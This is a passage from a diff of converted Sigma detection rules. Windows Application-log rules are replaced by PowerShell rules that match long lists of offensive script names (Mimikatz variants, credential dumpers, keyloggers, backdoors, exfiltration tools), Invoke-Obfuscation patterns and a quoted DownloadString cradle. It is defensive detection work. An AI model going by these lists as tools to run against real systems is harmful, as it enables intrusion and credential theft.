(((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_susp_msmpeng_crash.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Audit CVE Event", - "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", - "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", - "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", "attack.impact", - "attack.t1499.004" + "attack.t1529", + "attack.g0091", + "attack.s0363" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" ], - "filename": "win_audit_cve.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows 